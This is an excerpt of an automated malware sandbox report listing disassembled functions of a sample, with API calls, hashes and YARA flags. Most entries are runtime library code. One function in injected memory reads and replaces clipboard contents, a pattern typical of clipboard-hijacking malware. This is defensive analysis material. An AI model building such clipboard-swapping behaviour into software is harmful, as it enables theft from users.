Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A

Function 00402823 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 323602529-0
Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54

Function 00403CC2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00403CC9

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94

Function 00432785 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004327C3

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9

Function 0043CFCB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D00C

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4

Function 004336A7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD

Function 0040FB0C Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004103C7

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D

Function 00404333 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 00404343

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
Instruction ID: fec367d8aa59221bd54f7e77a34cd6e8baa5892bd02020f9b8e7ed08d49e55ed
Opcode Fuzzy Hash: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
Instruction Fuzzy Hash: 71D067B1518611CEE764DF69E444656B7E4EF04310B24492FE4D9D2694E6749880CB44

Function 0043CD0A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95

Function 009A9C75 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 009A9CC6

Memory Dump Source

Source File: 00000000.00000002.3887735397.00000000009A9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009A9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a9000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 8b948ec05e869c279452170398c9eda646e140a274fcac3e10704ba9c7ebc467
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: B2113C79A00208EFDB01DF98CA85E98BBF5AF09350F058094F9489B362D771EA90DF90

Non-executed Functions

Function 02471942 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0247194D
Sleep.KERNEL32(00001541), ref: 02471957

Part of subcall function 0247CE77: _strlen.LIBCMT ref: 0247CE8E

OpenClipboard.USER32(00000000), ref: 02471984
GetClipboardData.USER32(00000001), ref: 02471994
_strlen.LIBCMT ref: 024719B0
_strlen.LIBCMT ref: 024719DF
_strlen.LIBCMT ref: 02471B23
EmptyClipboard.USER32 ref: 02471B39
GlobalAlloc.KERNEL32(00000002,00000001), ref: 02471B46
GlobalUnlock.KERNEL32(00000000), ref: 02471B70
SetClipboardData.USER32(00000001,00000000), ref: 02471B79
GlobalFree.KERNEL32(00000000), ref: 02471B80
CloseClipboard.USER32 ref: 02471BA4
Sleep.KERNEL32(000002D2), ref: 02471BAF

Strings

i, xrefs: 024719C0
4#E, xrefs: 0247195D

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: 4#E$i
API String ID: 4246938166-2480119546
Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction ID: 298b8b0c4fbb2f95e2a549cbd02ea28dd9dae5447529ee76f9fe55d805f2df1f
Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
Instruction Fuzzy Hash: 50512430C00794DAE7119FA4ED45BED7B74FF2A306F04522AD809A2172EB709685CB69

Function 02472361 Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0247239C
GetClientRect.USER32(?,?), ref: 024723B1
GetDC.USER32(?), ref: 024723B8
CreateSolidBrush.GDI32(00646464), ref: 024723CB
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 024723EA
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0247240B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 02472416
MulDiv.KERNEL32(00000008,00000000), ref: 0247241F
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02472443
SetBkMode.GDI32(?,00000001), ref: 024724CE
_wcslen.LIBCMT ref: 024724E6

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
String ID:
API String ID: 1529870607-0
Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction ID: 472f69582a65b026421a699589cae298f55ecf5e302f3a7551bcf3816fd69b57
Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
Instruction Fuzzy Hash: 7571ED72900228AFDB62DF64DD85FAEBBBCEB09751F0041A5F509E6155DA70AF84CF20

Function 0043D678 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0043D7BE

Strings

1#SNAN, xrefs: 0043E9BD
1#QNAN, xrefs: 0043E9C4
1#INF, xrefs: 0043E9CB
1#IND, xrefs: 0043E9B6

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45

Function 0043B76E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845

Strings

ACP, xrefs: 0043B78C
OCP, xrefs: 0043B7C2

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8

Function 024AB9D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,024ABCF4,?,00000000), ref: 024ABA6E
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,024ABCF4,?,00000000), ref: 024ABA97
GetACP.KERNEL32(?,?,024ABCF4,?,00000000), ref: 024ABAAC

Strings

OCP, xrefs: 024ABA29
ACP, xrefs: 024AB9F3

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: ed2214ac0c159f1f5d33b7d022289b03c00b33e6c91c490dd3f30d079a01211e
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: A6217132701105AAEB348F54D921BA777A6EB74E5CB56C166E90BDB310F732DE81C390

Function 0043B942 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9

Function 024ABBA9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

Part of subcall function 024A2141: _free.LIBCMT ref: 024A21A0
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21AD

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 024ABCB5
IsValidCodePage.KERNEL32(00000000), ref: 024ABD10
IsValidLocale.KERNEL32(?,00000001), ref: 024ABD1F
GetLocaleInfoW.KERNEL32(?,00001001,024A0A1C,00000040,?,024A0B3C,00000055,00000000,?,?,00000055,00000000), ref: 024ABD67
GetLocaleInfoW.KERNEL32(?,00001002,024A0A9C,00000040), ref: 024ABD86

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction ID: f39d98138fc9caf841d53f0a252733b97d08d496ac0f154d6704bd27d57516a5
Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction Fuzzy Hash: E3518071900209ABEB11DFA5DC54EBB77B9FF35708F04042FE904EB290EB719A458B61

Function 0042EAE0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

C, xrefs: 0042EF48, 0042ED32, 0042EBC1
C, xrefs: 0042EAFD, 0042ECA8, 0042EECC, 0042EE66, 0042ECF6, 0042EC84

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID:
String ID: C$C
API String ID: 0-238425240
Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94

Function 0043B00A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
_wcschr.LIBVCRUNTIME ref: 0043B17C
_wcschr.LIBVCRUNTIME ref: 0043B18A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9

Function 024AB271 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,024A0A23,?,?,?,?,024A047A,?,00000004), ref: 024AB353
_wcschr.LIBVCRUNTIME ref: 024AB3E3
_wcschr.LIBVCRUNTIME ref: 024AB3F1
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,024A0A23,00000000,024A0B43), ref: 024AB494

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction ID: 11f06087d66e941983c32c890548f9314098312aa69c78252939f7d3e4083064
Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction Fuzzy Hash: AC61D672600306AAEB25AB75DC65BBB73A9EF34718F14442FE905DB280EB74D541CBA0

Function 0043B3F5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free
String ID:
API String ID: 2834031935-0
Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99

Function 0042A3D3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49

Function 0249A63A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0247DAD7), ref: 0249A732
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0247DAD7), ref: 0249A73C
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0247DAD7), ref: 0249A749

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction ID: 0b2e93ba2950da1c8cccccb63699f4fe7742ba26b32d44f259996fcecca0737f
Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction Fuzzy Hash: E531C47491132C9BCB21EF65D98879DBBB8BF08710F5042EAE41CA7260E7349F858F45

Function 0042FE5F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
ExitProcess.KERNEL32 ref: 0042FE99

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88

Function 024A00C6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,024A009C,00000000,00457970,0000000C,024A01F3,00000000,00000002,00000000), ref: 024A00E7
TerminateProcess.KERNEL32(00000000,?,024A009C,00000000,00457970,0000000C,024A01F3,00000000,00000002,00000000), ref: 024A00EE
ExitProcess.KERNEL32 ref: 024A0100

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

